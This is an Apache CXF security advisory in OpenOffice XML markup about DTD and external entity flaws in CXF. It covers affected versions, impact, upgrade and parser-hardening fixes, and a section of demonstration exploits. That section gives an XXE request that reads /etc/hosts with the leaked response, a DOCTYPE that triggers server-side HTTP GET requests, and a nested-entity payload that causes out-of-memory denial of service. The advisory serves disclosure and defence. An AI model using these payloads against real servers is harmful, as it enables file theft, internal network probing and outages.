      <text:p text:style-name="P34">According to the SOAP 1.1 specification, “A SOAP message MUST NOT contain a Document Type Declaration.” In CXF, this constraint is enforced in the ReadHeadersInterceptor class as it tries to find the SOAP:Envelope element. This approach presents two issues:</text:p>
      <text:list xml:id="list327675385" text:style-name="L1">
        <text:list-header>
          <text:p text:style-name="P68"/>
        </text:list-header>
        <text:list-item>
          <text:p text:style-name="P72">It only works for SOAP bindings. HTTP bindings supporting plain XML messages still allow document type declarations in request messages. </text:p>
          <text:p text:style-name="P73"/>
        </text:list-item>
        <text:list-item>
          <text:p text:style-name="P74"><text:span text:style-name="T2">When processing a document with a document type declaration, an error is only reported after receiving the DTD</text:span><text:span text:style-name="T4"> </text:span><text:span text:style-name="T2">event from the StAX parser. However, at this point, the StAX parser may already have processed (part of) the document type declaration. </text:span></text:p>
        </text:list-item>
      </text:list>
      <text:p text:style-name="P4"/>
      <text:p text:style-name="P34">This implies that CXF is vulnerable to DTD based XML attacks. There are two types of such attacks:</text:p>
      <text:list xml:id="list1991316518" text:style-name="L2">
        <text:list-item>
          <text:p text:style-name="P75">Document type declarations may reference other documents, namely a DTD or external entities declared in the internal subset. If the XML parser is configured with a default entity resolver (which is the case for CXF), this allows an attacker to instruct the parser to access arbitrary files. Since URLs may be used as system IDs, this includes remote resources accessible only in the network where the server is deployed. An attacker may exploit this in several ways:</text:p>
          <text:list>
            <text:list-item>
              <text:p text:style-name="P76">By inspecting the error message in the service response, he may be able to scan for the presence of certain files on the local file system of the server or for the availability of certain network resources accessible to the server.</text:p>
            </text:list-item>
            <text:list-item>
              <text:p text:style-name="P76">By including an internal subset in the document type declaration of the request and using external entity declarations, he may be able to include the content of arbitrary files (local to the server) in the request. There are many services that produce responses that include information from the request message (either as part of a normal response or a SOAP fault). By carefully crafting the request, the attacker may thus be able to retrieve the content of arbitrary files from the server.</text:p>
            </text:list-item>
            <text:list-item>
              <text:p text:style-name="P77"><text:span text:style-name="T1">Using URLs with the “http” scheme, the attacker may use the</text:span><text:span text:style-name="T5"> </text:span><text:span text:style-name="T1">vulnerability to let the server execute arbitrary HTTP GET requests and attack other systems that have some form of trust relationship with the CXF server.</text:span></text:p>
            </text:list-item>
          </text:list>
        </text:list-item>
      </text:list>
      <text:list xml:id="list832899394" text:style-name="L3">
        <text:list-item>
          <text:p text:style-name="P78">While XML does not allow recursive entity definitions, it does permit nested entity definitions. If a document has very deeply nested entity definitions, parsing that document can result in very high CPU and memory consumption during entity expansion. This produces the potential for Denial of Service attacks.</text:p>
        </text:list-item>
      </text:list>
      <text:p text:style-name="P17"/>
      <text:p text:style-name="P39"><text:soft-page-break/>2. Systems affected</text:p>
      <text:p text:style-name="P18"/>
      <text:p text:style-name="P40">2.1. CXF deployments</text:p>
      <text:p text:style-name="P19"/>
      <text:p text:style-name="P42">All CXF installations with versions prior to 2.2.9/2.1.10/2.0.13 are, to some extent, vulnerable. The most vulnerable installations are those on which at least one service is deployed that has an HTTP binding.</text:p>
      <text:p text:style-name="P20"/>
      <text:p text:style-name="P35"/>
      <text:p text:style-name="P42">Note that all types of CXF deployments are affected by these vulnerabilities. This includes standalone deployments, deployments using the WAR deployments, as well as Web applications embedding CXF.</text:p>
      <text:p text:style-name="P21"/>
      <text:p text:style-name="P41">2.2. Other products</text:p>
      <text:p text:style-name="P22"/>
      <text:p text:style-name="P42">CXF is used in (or as the basis for) other products. This includes the ServiceMix, Camel, <text:s/>Chemistry (in incubation), jUDDI, and Geronimo projects from the ASF, several open source projects outside the ASFas well as several commercial products. It is likely that these products are vulnerable as well.</text:p>
      <text:p text:style-name="P23"/>
      <text:p text:style-name="P43">It is possible that Web service frameworks other than CXF are affected by similar vulnerabilities.</text:p>
      <text:p text:style-name="P24"/>
      <text:p text:style-name="P42">The exploits described in section 5 may be used to check whether a given product is vulnerable.</text:p>
      <text:p text:style-name="P21"/>
      <text:p text:style-name="P39">3. Impact assessment</text:p>
      <text:p text:style-name="P20"/>
      <text:p text:style-name="P42">The vulnerability described in this advisory may allow an attacker to read arbitrary files on the file system of the node where CXF runs, provided that the account running the CXF instance has access to these files and that Java 2 security is not used to prevent file system access. An attacker may also be able to retrieve unsecured resources from the network if they are reachable from the CXF instance with URLs that are recognized by the Java runtime. However, to do so, the attacker needs to create a specially crafted request that requires knowledge about the services deployed on the CXF instance. Therefore, this vulnerability cannot be exploited in an automated way.</text:p>
      <text:p text:style-name="P19"/>
      <text:p text:style-name="P38"><text:span text:style-name="T1">The vulnerability may also allow the attacker to check the file system of the server (resp. network resources reachable by the server) for the existence of </text:span><text:span text:style-name="T3">certain files (resp. resources), as well as to carry out Denial of Service attacks. These attacks don’t require knowledge about the services deployed on CXF and may thus be exploited using scripting.</text:span></text:p>
      <text:p text:style-name="P25"/>
      <text:p text:style-name="P42">It is important that all users of CXF (and derived products) who have deployments that accept XML messages from untrusted sources take appropriate actions to mitigate the risk caused by the vulnerability described in this advisory. This also applies to users who have secured their installations using WS-Security.</text:p>
      <text:p text:style-name="P26"/>
      <text:p text:style-name="P39">4. Solutions</text:p>
      <text:p text:style-name="P27"/>
      <text:p text:style-name="P43">In order to avoid the vulnerability described in this advisory, apply one of the solutions explained in the following sections.</text:p>
      <text:p text:style-name="P7"/>
      <text:p text:style-name="P40">4.1. Upgrade to the latest CXF patch levels</text:p>
      <text:p text:style-name="P20"/>
      <text:p text:style-name="P42"><text:soft-page-break/>The security issue described in this advisory is fixed in CXF 2.0.13, 2.1.10 and 2.2.9. These releases forbid document type declarations even for HTTP binding messages documents. These versions are the latest patch levels for the various branches of CXF and contain numerous other fixes. <text:s/>Therefore upgrading to one of these versions is the best solution. <text:s text:c="2"/>All users are STRONGLY encouraged to use this solution.</text:p>
      <text:p text:style-name="P28"/>
      <text:list xml:id="list1056629358" text:style-name="L4">
        <text:list-item>
          <text:list>
            <text:list-header>
              <text:p text:style-name="P65">4.2. <text:s/>Replace the default parser</text:p>
            </text:list-header>
          </text:list>
        </text:list-item>
      </text:list>
      <text:p text:style-name="P12"/>
      <text:p text:style-name="P53"><text:span text:style-name="T1">CXF provides the ability to specify your own XMLInputFactory that is used to create the </text:span><text:span text:style-name="T1">XMLStreamReader used to parse the XML messages. <text:s/>Using that functionality, you can configure in a parser that has the DTD processing turned off. <text:s text:c="3"/>For example, using the samples/wsdl_first_pure_xml sample that comes with CXF, you can add a class like:</text:span></text:p>
      <text:p text:style-name="P54"/>
      <text:p text:style-name="P55">package demo.hw.server;</text:p>
      <text:p text:style-name="P56"/>
      <text:p text:style-name="P55">import javax.xml.stream.XMLInputFactory;</text:p>
      <text:p text:style-name="P55">import javax.xml.stream.XMLResolver;</text:p>
      <text:p text:style-name="P55">import javax.xml.stream.XMLStreamException;</text:p>
      <text:p text:style-name="P56"/>
      <text:p text:style-name="P55">public class ParserFactory {</text:p>
      <text:p text:style-name="P56"/>
      <text:p text:style-name="P55"><text:s text:c="4"/>public static XMLInputFactory createFactory() {</text:p>
      <text:p text:style-name="P55"><text:s text:c="8"/>XMLInputFactory factory = XMLInputFactory.newInstance();</text:p>
      <text:p text:style-name="P55"><text:s text:c="8"/>factory.setProperty(XMLInputFactory.IS_NAMESPACE_AWARE, Boolean.TRUE);</text:p>
      <text:p text:style-name="P55"><text:s text:c="8"/>factory.setProperty(XMLInputFactory.SUPPORT_DTD, Boolean.FALSE);</text:p>
      <text:p text:style-name="P55"><text:s text:c="8"/>factory.setProperty(XMLInputFactory.IS_REPLACING_ENTITY_REFERENCES,</text:p>
      <text:p text:style-name="P55"><text:s text:c="28"/>Boolean.FALSE);</text:p>
      <text:p text:style-name="P55"><text:s text:c="8"/>factory.setProperty(XMLInputFactory.IS_SUPPORTING_EXTERNAL_ENTITIES,</text:p>
      <text:p text:style-name="P55"><text:s text:c="28"/>Boolean.FALSE);</text:p>
      <text:p text:style-name="P55"><text:s text:c="8"/>factory.setXMLResolver(new XMLResolver() {</text:p>
      <text:p text:style-name="P55"><text:s text:c="12"/>public Object resolveEntity(String publicID, String systemID,</text:p>
      <text:p text:style-name="P55"><text:s text:c="40"/>String baseURI, String namespace)</text:p>
      <text:p text:style-name="P55"><text:s text:c="16"/>throws XMLStreamException {</text:p>
      <text:p text:style-name="P55"><text:s text:c="16"/>throw new XMLStreamException("Reading external entities is disabled");</text:p>
      <text:p text:style-name="P55"><text:s text:c="12"/>}</text:p>
      <text:p text:style-name="P55"><text:s text:c="8"/>});</text:p>
      <text:p text:style-name="P55"><text:s text:c="8"/>return factory;</text:p>
      <text:p text:style-name="P55"><text:s text:c="4"/>}</text:p>
      <text:p text:style-name="P55">}</text:p>
      <text:p text:style-name="P8"/>
      <text:p text:style-name="P13">You would then configure that onto the endpoint in your cxf.xml (or other spring config file) like: <text:s/>(using the same sample)</text:p>
      <text:p text:style-name="P9"/>
      <text:p text:style-name="P46">&lt;?xml version="1.0" encoding="UTF-8"?&gt;</text:p>
      <text:p text:style-name="P46">&lt;beans xmlns="http://www.springframework.org/schema/beans"</text:p>
      <text:p text:style-name="P46"><text:s text:c="6"/>xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"</text:p>
      <text:p text:style-name="P46"><text:s text:c="6"/>xmlns:jaxws="http://cxf.apache.org/jaxws"</text:p>
      <text:p text:style-name="P46"><text:s text:c="6"/>xmlns:cxf="http://cxf.apache.org/core"</text:p>
      <text:p text:style-name="P46"><text:s text:c="6"/>xsi:schemaLocation="</text:p>
      <text:p text:style-name="P46">http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans.xsd</text:p>
      <text:p text:style-name="P46">http://cxf.apache.org/core http://cxf.apache.org/schemas/core.xsd</text:p>
      <text:p text:style-name="P45"><text:span text:style-name="T12">http://cxf.apache.org/jaxws </text:span><text:a xlink:type="simple" xlink:href="http://cxf.apache.org/schemas/jaxws.xsd"><text:span text:style-name="T12">http://cxf.apache.org/schemas/jaxws.xsd</text:span></text:a><text:span text:style-name="T12">"&gt;</text:span></text:p>
      <text:p text:style-name="P47"/>
      <text:p text:style-name="P46"><text:s text:c="4"/>&lt;jaxws:endpoint name="{http://apache.org/hello_world_xml_http/bare}XMLPort"</text:p>
      <text:p text:style-name="P46"><text:soft-page-break/><text:s text:c="8"/>wsdlLocation="wsdl/hello_world.wsdl"</text:p>
      <text:p text:style-name="P46"><text:s text:c="8"/>createdFromAPI="true"&gt;</text:p>
      <text:p text:style-name="P46"><text:s text:c="8"/>&lt;jaxws:properties&gt;</text:p>
      <text:p text:style-name="P46"><text:s text:c="12"/>&lt;entry key="javax.xml.stream.XMLInputFactory"&gt;</text:p>
      <text:p text:style-name="P46"><text:s text:c="16"/>&lt;bean class="demo.hw.server.ParserFactory" </text:p>
      <text:p text:style-name="P46"><text:s text:c="22"/>factory-method="createFactory"/&gt;</text:p>
      <text:p text:style-name="P46"><text:s text:c="12"/>&lt;/entry&gt;</text:p>
      <text:p text:style-name="P46"><text:s text:c="8"/>&lt;/jaxws:properties&gt;</text:p>
      <text:p text:style-name="P46"><text:s text:c="4"/>&lt;/jaxws:endpoint&gt;</text:p>
      <text:p text:style-name="P46">&lt;/beans&gt;</text:p>
      <text:p text:style-name="P9"/>
      <text:p text:style-name="P9"/>
      <text:p text:style-name="P16">5. Exploits</text:p>
      <text:p text:style-name="P18"/>
      <text:p text:style-name="P40">5.1. Remote file access</text:p>
      <text:p text:style-name="P19"/>
      <text:p text:style-name="P44">The vulnerability can be demonstrated using a stock CXF 2.2.8 distribution by using the wsdl_first_pure_xml sample. <text:s text:c="2"/>In samples/wsdl_first_pure_xml, start the server by running “ant server”. <text:s text:c="2"/></text:p>
      <text:p text:style-name="P10"/>
      <text:p text:style-name="P14">The request that exposes the vulnerability is as follows:</text:p>
      <text:p text:style-name="P12"/>
      <text:p text:style-name="P51">&lt;!DOCTYPE <text:s/>requestType <text:s/>[<text:line-break/><text:tab/>&lt;!ENTITY file SYSTEM "/etc/hosts"&gt;</text:p>
      <text:p text:style-name="P50">]&gt;</text:p>
      <text:p text:style-name="P50">&lt;requestType xmlns="<text:a xlink:type="simple" xlink:href="http://apache.org/hello_world_xml_http/bare/types">http://apache.org/hello_world_xml_http/bare/types</text:a>"&gt;</text:p>
      <text:p text:style-name="P50">&amp;file;</text:p>
      <text:p text:style-name="P50">&lt;/requestType&gt; </text:p>
      <text:p text:style-name="P58"/>
      <text:p text:style-name="P36">Sending this request to the wsdl_first_pure_xml sample gives the following response:</text:p>
      <text:p text:style-name="P11"/>
      <text:p text:style-name="P60">&lt;responseType xmlns="http://apache.org/hello_world_xml_http/bare/types"&gt;Hello # /etc/hosts: Local Host Database</text:p>
      <text:p text:style-name="P62">#</text:p>
      <text:p text:style-name="P62"># This file describes a number of aliases-to-address mappings for the for </text:p>
      <text:p text:style-name="P62"># local hosts that share this file.</text:p>
      <text:p text:style-name="P62">#</text:p>
      <text:p text:style-name="P62"># In the presence of the domain name service or NIS, this file may not be </text:p>
      <text:p text:style-name="P62"># consulted at all; see /etc/host.conf for the resolution order.</text:p>
      <text:p text:style-name="P62">#</text:p>
      <text:p text:style-name="P63"/>
      <text:p text:style-name="P62"># IPv4 and IPv6 localhost aliases</text:p>
      <text:p text:style-name="P62">127.0.0.1 <text:s text:c="6"/>localhost</text:p>
      <text:p text:style-name="P62">::1 <text:s text:c="12"/>localhost</text:p>
      <text:p text:style-name="P62">&lt;/responseType&gt;</text:p>
      <text:p text:style-name="P61"/>
      <text:p text:style-name="P29"/>
      <text:p text:style-name="P6"><text:span text:style-name="T8">As can be seen, the response includes the full content of the </text:span><text:span text:style-name="T9">/etc/hosts</text:span><text:span text:style-name="T8"> file. While this leverages a particular feature of the wsdl_first_pure_xml sample, it is expected that a similar </text:span><text:soft-page-break/><text:span text:style-name="T8">attack can be performed with many real world services.</text:span></text:p>
      <text:p text:style-name="P57"/>
      <text:p text:style-name="P59">5.2. Arbitrary HTTP GET request execution</text:p>
      <text:p text:style-name="P20"/>
      <text:p text:style-name="P42">The DOCTYPE processing can also be used to trick CXF into executing arbitrary HTTP GET requests (including query parameters):</text:p>
      <text:p text:style-name="P30"/>
      <text:p text:style-name="P52"><text:span text:style-name="T1">&lt;!DOCTYPE root SYSTEM "</text:span><text:a xlink:type="simple" xlink:href="http://www.google.com/search?q=test"><text:span text:style-name="T1">http://www.google.com/search?q=test</text:span></text:a><text:span text:style-name="T1">"&gt;<text:line-break/>&lt;root/&gt;</text:span></text:p>
      <text:p text:style-name="P67"/>
      <text:p text:style-name="P40">5.3. Denial of Service</text:p>
      <text:p text:style-name="P19"/>
      <text:p text:style-name="P43">A Denial of Service attack using deeply nested entity definitions can easily be demonstrated using the following request:</text:p>
      <text:p text:style-name="P31"/>
      <text:p text:style-name="P48"><text:span text:style-name="T11">&lt;!DOCTYPE <text:s/>root <text:s/>[<text:line-break/><text:tab/>&lt;!ENTITY x32 "foobar"&gt;<text:line-break/><text:tab/>&lt;!ENTITY x31 "&amp;x32;&amp;x32;"&gt;<text:line-break/><text:tab/>&lt;!ENTITY x30 "&amp;x31;&amp;x31;"&gt;<text:line-break/><text:tab/>&lt;!ENTITY x29 "&amp;x30;&amp;x30;"&gt;<text:line-break/><text:tab/>&lt;!ENTITY x28 "&amp;x29;&amp;x29;"&gt;<text:line-break/><text:tab/>&lt;!ENTITY x27 "&amp;x28;&amp;x28;"&gt;<text:line-break/><text:tab/>&lt;!ENTITY x26 "&amp;x27;&amp;x27;"&gt;<text:line-break/><text:tab/>&lt;!ENTITY x25 "&amp;x26;&amp;x26;"&gt;<text:line-break/><text:tab/></text:span><text:span text:style-name="T11">&lt;!ENTITY x24 "&amp;x25;&amp;x25;"&gt;</text:span><text:span text:style-name="T11"><text:line-break/><text:tab/></text:span><text:span text:style-name="T11">&lt;!ENTITY x23 "&amp;x24;&amp;x24;"&gt;</text:span><text:span text:style-name="T11"><text:line-break/><text:tab/></text:span><text:span text:style-name="T11">&lt;!ENTITY x22 "&amp;x23;&amp;x23;"&gt;</text:span><text:span text:style-name="T11"><text:line-break/><text:tab/></text:span><text:span text:style-name="T11">&lt;!ENTITY x21 "&amp;x22;&amp;x22;"&gt;</text:span><text:span text:style-name="T11"><text:line-break/><text:tab/></text:span><text:span text:style-name="T11">&lt;!ENTITY x20 "&amp;x21;&amp;x21;"&gt;</text:span><text:span text:style-name="T11"><text:line-break/><text:tab/></text:span><text:span text:style-name="T11">&lt;!ENTITY x19 "&amp;x20;&amp;x20;"&gt;</text:span><text:span text:style-name="T11"><text:line-break/><text:tab/></text:span><text:span text:style-name="T11">&lt;!ENTITY x18 "&amp;x19;&amp;x19;"&gt;</text:span><text:span text:style-name="T11"><text:line-break/><text:tab/></text:span><text:span text:style-name="T11">&lt;!ENTITY x17 "&amp;x18;&amp;x18;"&gt;</text:span><text:span text:style-name="T11"><text:line-break/><text:tab/></text:span><text:span text:style-name="T11">&lt;!ENTITY x16 "&amp;x17;&amp;x17;"&gt;</text:span><text:span text:style-name="T11"><text:line-break/><text:tab/></text:span><text:span text:style-name="T11">&lt;!ENTITY x15 "&amp;x16;&amp;x16;"&gt;</text:span><text:span text:style-name="T11"><text:line-break/><text:tab/></text:span><text:span text:style-name="T11">&lt;!ENTITY x14 "&amp;x15;&amp;x15;"&gt;</text:span><text:span text:style-name="T11"><text:line-break/><text:tab/></text:span><text:span text:style-name="T11">&lt;!ENTITY x13 "&amp;x14;&amp;x14;"&gt;</text:span><text:span text:style-name="T11"><text:line-break/><text:tab/></text:span><text:span text:style-name="T11">&lt;!ENTITY x12 "&amp;x13;&amp;x13;"&gt;</text:span><text:span text:style-name="T11"><text:line-break/><text:tab/></text:span><text:span text:style-name="T11">&lt;!ENTITY x11 "&amp;x12;&amp;x12;"&gt;</text:span><text:span text:style-name="T11"><text:line-break/><text:tab/></text:span><text:span text:style-name="T11">&lt;!ENTITY x10 "&amp;x11;&amp;x11;"&gt;</text:span><text:span text:style-name="T11"><text:line-break/><text:tab/></text:span><text:span text:style-name="T11">&lt;!ENTITY x9 <text:s/>"&amp;x10;&amp;x10;"&gt;</text:span><text:span text:style-name="T11"><text:line-break/><text:tab/></text:span><text:span text:style-name="T11">&lt;!ENTITY x8 <text:s/>"&amp;x9;&amp;x9;"&gt;</text:span><text:span text:style-name="T11"><text:line-break/><text:tab/></text:span><text:span text:style-name="T11">&lt;!ENTITY x7 <text:s/>"&amp;x8;&amp;x8;"&gt;</text:span><text:span text:style-name="T11"><text:line-break/><text:tab/></text:span><text:span text:style-name="T11">&lt;!ENTITY x6 <text:s/>"&amp;x7;&amp;x7;"&gt;</text:span><text:span text:style-name="T11"><text:line-break/><text:tab/></text:span><text:span text:style-name="T11">&lt;!ENTITY x5 <text:s/>"&amp;x6;&amp;x6;"&gt;</text:span><text:span text:style-name="T11"><text:line-break/><text:tab/></text:span><text:span text:style-name="T11">&lt;!ENTITY x4 <text:s/>"&amp;x5;&amp;x5;"&gt;</text:span><text:span text:style-name="T11"><text:line-break/><text:tab/></text:span><text:span text:style-name="T11">&lt;!ENTITY x3 <text:s/>"&amp;x4;&amp;x4;"&gt;</text:span><text:span text:style-name="T11"><text:line-break/><text:tab/></text:span><text:span text:style-name="T11">&lt;!ENTITY x2 <text:s/>"&amp;x3;&amp;x3;"&gt;</text:span><text:span text:style-name="T11"><text:line-break/><text:tab/></text:span><text:span text:style-name="T11">&lt;!ENTITY x1 <text:s/>"&amp;x2;&amp;x2;"&gt;</text:span></text:p>
      <text:p text:style-name="P49"><text:span text:style-name="T11">]&gt;</text:span><text:span text:style-name="T11"><text:line-break/></text:span><text:span text:style-name="T11">&lt;root attr=”&amp;x1;”/&gt;</text:span></text:p>
      <text:p text:style-name="P37"><text:soft-page-break/></text:p>
      <text:p text:style-name="P15">When sent to any valid HTTP endpoint, this request will cause an out of memory condition on the server. <text:s/>The reason is that while checking if the request is acceptable, CXF needs to parse the start tag of the document element. The expansion of the entity used in the attribute on this element will then cause an out of memory error.</text:p>
      <text:p text:style-name="P18"/>
      <text:p text:style-name="P39">6. Contact</text:p>
      <text:p text:style-name="P27"/>
      <text:p text:style-name="P5"><text:span text:style-name="T1">Please send all security relevant comments (e.g. about additional vulnerabilities not identified by this advisory) to </text:span><text:span text:style-name="T6">security@apache.org</text:span><text:span text:style-name="T1">. Questions and comments that are not security relevant may be sent to the public </text:span><text:span text:style-name="T6">dev@cxf.apache.org</text:span><text:span text:style-name="T1"> mailing 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style:font-face style:name="OpenSymbol" svg:font-family="OpenSymbol"/>
    <style:font-face style:name="Lucida Sans" svg:font-family="'Lucida Sans'" style:font-family-generic="swiss"/>
    <style:font-face style:name="Verdana" svg:font-family="Verdan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Example" style:family="text">
      <style:text-properties style:font-name="DejaVu Sans Mono" style:font-name-asian="DejaVu Sans Mono"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5T13:08:24</meta:creation-date>
    <dc:date>2010-06-16T10:45:20</dc:date>
    <meta:editing-duration>PT00H20M15S</meta:editing-duration>
    <meta:editing-cycles>6</meta:editing-cycles>
    <meta:generator>OpenOffice.org/3.2$Unix OpenOffice.org_project/320m12$Build-9483</meta:generator>
    <meta:document-statistic meta:table-count="0" meta:image-count="0" meta:object-count="0" meta:page-count="6" meta:paragraph-count="110" meta:word-count="1549" meta:character-count="11490"/>
  </office:meta>
</office:document-meta>
</file>